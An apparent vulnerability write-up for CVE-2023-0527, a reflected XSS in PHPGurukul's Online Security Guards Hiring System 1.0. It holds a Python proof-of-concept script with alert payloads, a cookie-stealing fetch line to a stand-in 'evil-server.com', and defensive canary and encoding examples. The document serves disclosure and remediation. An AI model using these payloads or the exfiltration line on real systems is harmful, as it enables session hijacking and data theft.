Online Security Guards Hiring System 1.0 - Reflected XSS
#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# The code below checks both parameters: adminname in /admin-profile.php and, with the edits noted in the comments, searchdata in /search.php
#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
```python
import requests
import re
from colorama import Fore

print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print()
print(Fore.RED + "NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py" + Fore.RESET)
print()

# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php"  # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
# THE PHPSESSID BELOW IS A FIXED, CLIENT-CHOSEN SESSION ID; EVERY REQUEST REUSES THESE
# HEADERS, SO THE LOGIN AND THE LATER PROFILE UPDATE SHARE ONE SERVER-SIDE SESSION
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://localhost/osghs/admin/login.php',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data=Admin_login_credentials)
if response.status_code == 200:
    # ON SUCCESS THE LOGIN PAGE ANSWERS WITH A JS REDIRECT OF THE FORM document.location = '...'
    location = re.findall(r'document.location =\'(.*?)\'', response.text)
    if location:
        print(Fore.GREEN + "> Login Successful into Admin Account" + Fore.RESET)
        print(Fore.GREEN + "> Popup:" + Fore.RESET, location)
    else:
        print(Fore.GREEN + "> document.location not found" + Fore.RESET)
else:
    # status_code IS AN int, SO IT HAS TO BE CONVERTED BEFORE CONCATENATION
    print(Fore.GREEN + "> Error: " + str(response.status_code) + Fore.RESET)
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)

# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url = "http://localhost/osghs/admin/admin-profile.php"  # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",  # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
    "username": "admin",  # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
    "mobilenumber": "8979555558",
    "email": "admin@gmail.com",
    "submit": "",
}
# SENDING THE FORM WITH A POST REQUEST (SAME HEADERS, SO SAME SESSION AS THE LOGIN)
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE UNENCODED SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
    scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : " + Fore.RESET)
    print(Fore.GREEN + ">" + Fore.RESET, scripts)
```

Online Security Guards Hiring System 1.0 – Reflected XSS Vulnerability Analysis
Security vulnerabilities in web applications are not just technical flaws—they represent real-world risks that can compromise user data, system integrity, and organizational trust. One such vulnerability recently discovered in the Online Security Guards Hiring System 1.0 (v1.0), developed by PHPGURUKUL, highlights a critical issue: Reflected Cross-Site Scripting (XSS). This flaw, identified by researcher Affan Ahmed, was assigned the CVE identifier CVE-2023-0527 and has been publicly documented with a proof-of-concept (POC) demonstrating its exploitability.
Understanding Reflected XSS
Reflected XSS occurs when an attacker injects malicious scripts into a web application through user input, such as URL parameters or form fields. The server then reflects the input back to the user without proper sanitization, allowing the script to execute in the victim’s browser. Unlike stored XSS, which persists in the database, reflected XSS is transient and triggered only when the malicious payload is accessed.
For example, if a web application uses a query parameter like search?q=malicious_script, and fails to sanitize the input, the script will be echoed back in the response, potentially executing in the user’s browser.
Targeted Components: Admin Profile and Search Page
The vulnerability in the Online Security Guards Hiring System 1.0 was found in two key components:
- admin-profile.php – The admin profile update page. The submitted adminname form field is written back into the rendered page without encoding.
- search.php – The search page. The searchdata field is echoed into the results page without validation or encoding.
Both endpoints are susceptible to malicious payloads being reflected directly into the HTML response, enabling attackers to inject JavaScript code that can steal cookies, redirect users, or perform other harmful actions.
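As an added example (not part of the original PoC or of the vendor's code), here is the check the PoC's regex approximates, generalized: submit a random canary that carries the four characters an HTML injection needs, then classify how it comes back. That separates a value reflected verbatim from one with only < and > encoded (still injectable inside an attribute) and from one fully encoded. The endpoint and parameter names are the advisory's; the sample responses are constructed to mimic those cases so the check runs offline (the partially encoded search.php input box is hypothetical, not observed on the page), and probe_live is the same check wired to a lab URL with urllib.

```python
"""Canary-based check for unencoded reflection of a form parameter.

Added example for this write-up; not part of the original PoC or of the
vendor's code. The responses below are constructed, not captured.
"""
import html
import re
import secrets
import string
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

SPECIALS = '<"\'>'  # the characters a tag or attribute injection needs


def make_canary() -> str:
    """Random marker wrapped around the special characters: MARK<"'>MARK."""
    mark = "".join(secrets.choice(string.ascii_lowercase) for _ in range(8))
    return f"{mark}{SPECIALS}{mark}"


def classify_reflection(body: str, canary: str) -> str:
    """Say how the canary came back in the response body.

    raw              -> every special char reflected verbatim (injectable)
    tags_unencoded   -> '<' or '>' survive (tag injection possible)
    quotes_unencoded -> only quotes survive (attribute break-out possible)
    encoded          -> marker present, all specials encoded
    not_reflected    -> marker absent
    """
    mark = canary[: (len(canary) - len(SPECIALS)) // 2]
    hits = re.findall(re.escape(mark) + r"(.*?)" + re.escape(mark), body, re.S)
    if not hits:
        return "not_reflected"
    worst = "encoded"
    for middle in hits:
        if middle == SPECIALS:
            return "raw"
        if "<" in middle or ">" in middle:
            worst = "tags_unencoded"
        elif ('"' in middle or "'" in middle) and worst == "encoded":
            worst = "quotes_unencoded"
    return worst


def constructed_responses(canary: str) -> dict:
    """Offline stand-ins for the endpoints (constructed for this example)."""
    no_tags = canary.replace("<", "&lt;").replace(">", "&gt;")  # a 'strip tags' style half-fix
    return {
        # admin-profile.php echoing adminname verbatim, as the PoC observes
        "admin-profile.php:adminname": f"<h4>Admin Name: {canary}</h4>",
        # hypothetical search.php re-populating its input box with only < and > encoded
        "search.php:searchdata": f'<input type="text" name="searchdata" value="{no_tags}">',
        # the same profile page after a full-encoding fix
        "fixed:adminname": f"<h4>Admin Name: {html.escape(canary, quote=True)}</h4>",
        # a page that never echoes the value
        "index.php:unused": "<h1>Welcome</h1>",
    }


def check_constructed(canary: str = "") -> dict:
    """Classify every constructed response; a fresh canary unless one is given."""
    canary = canary or make_canary()
    return {name: classify_reflection(body, canary)
            for name, body in constructed_responses(canary).items()}


def probe_live(url: str, param: str, fields: dict, opener=None) -> str:
    """POST the form with `param` set to a fresh canary and classify the reply.

    `opener` should already hold the admin session cookie (log in through it
    first). Network helper for a lab instance; not used by the offline demo.
    """
    opener = opener or urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))
    canary = make_canary()
    data = urllib.parse.urlencode({**fields, param: canary}).encode()
    with opener.open(urllib.request.Request(url, data=data)) as resp:
        return classify_reflection(resp.read().decode("utf-8", "replace"), canary)


if __name__ == "__main__":
    for name, verdict in check_constructed().items():
        print(f"{name:30} {verdict}")
```

Run against the XAMPP instance, probe_live("http://localhost/osghs/admin/admin-profile.php", "adminname", {"username": "admin", "mobilenumber": "...", "email": "...", "submit": ""}, opener) is expected to come back "raw" for the unpatched 1.0 and "encoded" once the values are passed through htmlspecialchars(). Anything other than "encoded" or "not_reflected" is worth a manual look at the surrounding markup, because the context (text node, attribute, script block) decides what payload works.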
Exploit Demonstration: Proof of Concept (POC)
```python
import requests
import re
from colorama import Fore

print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print()
print(Fore.RED + "NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py" + Fore.RESET)
print()

Website_url = "http://localhost/osghs/admin/login.php"
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.9,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://localhost/osghs/admin/login.php',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data=Admin_login_credentials)
if response.status_code == 200:
    location = re.findall(r'document.location =\'(.*?)\'', response.text)
    if location:
        print(Fore.GREEN + "> Login Successful into Admin Account" + Fore.RESET)
        print(Fore.GREEN + "> Popup:" + Fore.RESET, location)
    else:
        print(Fore.GREEN + "> document.location not found" + Fore.RESET)
else:
    print(Fore.GREEN + "> Login Failed" + Fore.RESET)
```
This excerpt is the first stage of the PoC shown at the top of the page; it stops after the login, and the full script then goes on to inject the payload.
- Authentication: The script POSTs to admin/login.php with the credentials the PoC uses (admin / Test@123). This is not an authentication bypass: the attacker needs a valid admin password, and the XSS then fires in an already privileged context. The Cookie header carries a fixed PHPSESSID that every later request reuses, so the login and the profile update share one session. That works because PHP accepts a client-chosen session ID under its default session.use_strict_mode=0; a requests.Session() that keeps the server-issued cookie is the more robust choice.
- Login check: On success the login page answers with a small JavaScript redirect of the form document.location = '...', and the script greps for that pattern to confirm it is in. The match says nothing about input reflection; it only tells the script it may proceed.
The injection happens in the second stage of the full PoC: the same headers are used to POST the profile form to admin/admin-profile.php with adminname set to TESTAdmin<script>alert("From-Admin-Name")</script>, and the response is searched with re.findall(r'<script>alert\(.*?\)</script>', ...) for the unencoded tag. A match means the server wrote the value into the page as-is, which is the reflection the advisory reports. Swapping the URL for search.php and the body for searchdata=<payload>&search= exercises the second affected parameter.
How the XSS Attack Works
The PoC targets form fields rather than a URL parameter. If the admin profile form is submitted with
adminname=TESTAdmin<script>alert("From-Admin-Name")</script>
or the search form with searchdata=<script>alert('XSS')</script>&search=, the application writes the value into the HTML response without encoding it. The browser parses the reflected text as a script element and runs it, which is what the alert popup proves. Because both requests are POSTs, an attacker has to get a victim to submit them, typically through an auto-submitting form on a page the attacker controls; for admin-profile.php the victim must also be logged in as admin. The popup is only a marker. The same position in the page can be used to:
- read document.cookie and send it to a server the attacker controls, e.g. fetch('https://evil-server.com/steal', {method: 'POST', body: document.cookie});
- redirect the victim to a phishing page, e.g. window.location = 'https://malicious-site.com';
- issue requests to the admin panel from inside the victim's authenticated session, which works even when the cookie itself cannot be read.
Security Implications and Risks
Reflected XSS in an administrative system like Online Security Guards Hiring System poses significant risks:
| Risk Category | Impact |
|---|---|
| Session Hijacking | Script can read document.cookie unless the session cookie is flagged HttpOnly; even then it can drive the admin panel from inside the victim's session. |
| Phishing Attacks | Malicious redirects can trick users into entering credentials on fake login pages. |
| Data Exfiltration | JavaScript can be used to send user data to external servers. |
| System Compromise | Admin-level access can lead to full system control, including database manipulation. |
Recommended Fixes and Best Practices
To mitigate this vulnerability, developers must encode output and validate input:
- Output Encoding: Encode every dynamic value at the point where it is written into HTML. In PHP that is htmlspecialchars($value, ENT_QUOTES, 'UTF-8'); ENT_QUOTES matters because values placed inside single-quoted attributes are otherwise left injectable. DOMPurify is the client-side counterpart, for the rare places where user-supplied HTML genuinely has to be rendered.
- Input Validation: Reject values that do not match the field's expected shape (a name or a search term has no business containing < or >). This is defence in depth; output encoding is the actual fix.
- Use Secure Headers: A Content-Security-Policy that disallows inline scripts and restricts script sources would block the injected alert even while the reflection remained.
- Parameterized Queries: Prepared statements protect against SQL injection, a separate class of flaw. They do nothing for XSS, so treat them as general hygiene rather than as a fix for this issue.
For the Online Security Guards Hiring System, the fix is to pass the reflected values, adminname in admin-profile.php and searchdata in search.php, through htmlspecialchars() with ENT_QUOTES before they are echoed.
This ensures that any script-like input is rendered as plain text rather than parsed as markup, preventing execution.
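The following is an added illustration, not the vendor's PHP, of what that fix changes in the bytes the browser receives. It emulates the two pages in Python: html.escape(value, quote=True) performs the same substitutions as htmlspecialchars($value, ENT_QUOTES, 'UTF-8') (the apostrophe becomes &#x27; rather than &#039;), and html.escape with quote=False plus a &quot; substitution stands in for ENT_COMPAT, the default before PHP 8.1. Where the values land in the markup (a text node for adminname, a single-quoted attribute for searchdata) is an assumption chosen to show both contexts; a small HTMLParser subclass then reports which renderings would still hand the browser something executable.

```python
"""Output encoding for the two reflected fields, emulated in Python.

Added example for this write-up; not the vendor's code. The templates are
assumptions about where adminname and searchdata land in the markup.
"""
import html
from html.parser import HTMLParser


class ActiveContentFinder(HTMLParser):
    """Collect what would run script: <script> elements and on* handlers."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")


def active_content(markup: str) -> list:
    """Return the script-bearing constructs a browser would see in `markup`."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# --- admin-profile.php: adminname in a text node -----------------------------
def profile_vulnerable(adminname: str) -> str:
    """echo $adminname; with no encoding (the 1.0 behaviour)."""
    return f"<h4>Admin Name: {adminname}</h4>"


def profile_fixed(adminname: str) -> str:
    """echo htmlspecialchars($adminname, ENT_QUOTES, 'UTF-8');"""
    return f"<h4>Admin Name: {html.escape(adminname, quote=True)}</h4>"


# --- search.php: searchdata re-populated in a single-quoted attribute --------
def search_compat(searchdata: str) -> str:
    """htmlspecialchars with ENT_COMPAT (pre-8.1 default): the apostrophe survives."""
    value = html.escape(searchdata, quote=False).replace('"', "&quot;")
    return f"<input type='text' name='searchdata' value='{value}'>"


def search_fixed(searchdata: str) -> str:
    """htmlspecialchars with ENT_QUOTES: both quote kinds encoded."""
    value = html.escape(searchdata, quote=True)
    return f"<input type='text' name='searchdata' value='{value}'>"


PAYLOAD_TEXT = 'TESTAdmin<script>alert("From-Admin-Name")</script>'  # the PoC's payload
PAYLOAD_ATTR = "' onfocus='alert(1)' autofocus='"                    # attribute break-out (constructed)

if __name__ == "__main__":
    cases = [
        ("profile, unpatched", profile_vulnerable(PAYLOAD_TEXT)),
        ("profile, ENT_QUOTES", profile_fixed(PAYLOAD_TEXT)),
        ("search, ENT_COMPAT", search_compat(PAYLOAD_ATTR)),
        ("search, ENT_QUOTES", search_fixed(PAYLOAD_ATTR)),
    ]
    for label, markup in cases:
        print(f"{label:20} {active_content(markup) or 'clean'}")
        print(f"{'':20} {markup}")
```

The second pair is the reason to insist on ENT_QUOTES: with ENT_COMPAT the search value still closes the single-quoted attribute and adds an onfocus handler, so a page that "already uses htmlspecialchars" can remain vulnerable in that context. Encoding belongs at the output point in every template that echoes these fields, not in a single sanitising pass on $_POST.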
Conclusion
The Reflected XSS vulnerability in the Online Security Guards Hiring System 1.0 serves as a stark reminder that even seemingly simple web applications can harbor critical security flaws. While the system may be intended for educational or demonstration purposes, its real-world deployment could lead to serious consequences. Security professionals must prioritize input validation, output encoding, and proactive vulnerability testing—especially in systems with administrative